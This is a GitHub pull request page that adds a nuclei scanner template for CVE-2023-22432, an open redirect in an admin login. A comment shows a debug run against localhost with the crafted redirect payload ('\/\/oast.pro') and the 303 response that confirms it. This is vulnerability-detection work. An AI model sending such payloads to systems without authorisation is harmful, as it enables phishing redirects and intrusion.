Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Create CVE-2023-22432.yaml #8272

Merged
merged 3 commits into from
Oct 3, 2023
Merged

Create CVE-2023-22432.yaml #8272

merged 3 commits into from
Oct 3, 2023

Conversation

DhiyaneshGeek
Copy link
Member

@DhiyaneshGeek DhiyaneshGeek commented Sep 27, 2023

Template / PR Information

  • Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
  • References:

Template Validation

I've validated this template locally?

  • YES
  • NO

Additional Details (leave it blank if not applicable)

Additional References:

@DhiyaneshGeek
Copy link
Member Author

geekfreak@localhost CVE-2023-22432 % nuclei -u http://127.0.0.1:8000 -t test.yaml -var password=password123 -debug -proxy=http://127.0.0.1:8080

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.0.0-dev

		projectdiscovery.io

[INF] Current nuclei version: v3.0.0-dev (development)
[INF] Current nuclei-templates version: v9.6.4 (latest)
[INF] New templates added in latest release: 121
[INF] Templates loaded for current scan: 1
[INF] Targets loaded for current scan: 1
[INF] [CVE-2023-22432] Dumped HTTP request for http://127.0.0.1:8000/admin/default/index

POST /admin/default/index HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Content-Length: 53
Content-Type: application/x-www-form-urlencoded
Origin: http://127.0.0.1:8000
Referer: http://127.0.0.1:8000/admin/default/index/?send=\/\/oast.pro
Accept-Encoding: gzip

password=password123&send=%5C%2F%5C%2Foast.pro&login=
[DBG] [CVE-2023-22432] Dumped HTTP response http://127.0.0.1:8000/admin/default/index

HTTP/1.1 303 SEE OTHER
Connection: close
Content-Length: 56
Content-Type: text/html; charset=UTF-8
Date: Wed, 27 Sep 2023 09:10:00 GMT
Location: \/\/oast.pro
Server: Rocket 1.2.6 Python/3.11.4
Set-Cookie: session_id_admin=127.0.0.1-ccddbf1a-d670-44b9-9918-f7d1695b5c2d; HttpOnly; Path=/; SameSite=Lax

You are being redirected <a href="\/\/oast.pro">here</a>
[CVE-2023-22432:word-1] [http] [medium] http://127.0.0.1:8000/admin/default/index
[CVE-2023-22432:status-2] [http] [medium] http://127.0.0.1:8000/admin/default/index

image

@DhiyaneshGeek DhiyaneshGeek added the Done Ready to merge label Sep 27, 2023
@DhiyaneshGeek DhiyaneshGeek linked an issue Sep 27, 2023 that may be closed by this pull request
@ritikchaddha ritikchaddha merged commit ac6bb18 into main Oct 3, 2023
2 checks passed
@ritikchaddha ritikchaddha deleted the CVE-2023-22432 branch October 3, 2023 08:10
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Done Ready to merge
Projects
None yet
Development

Successfully merging this pull request may close these issues.

CVE-2023-22432.yaml
3 participants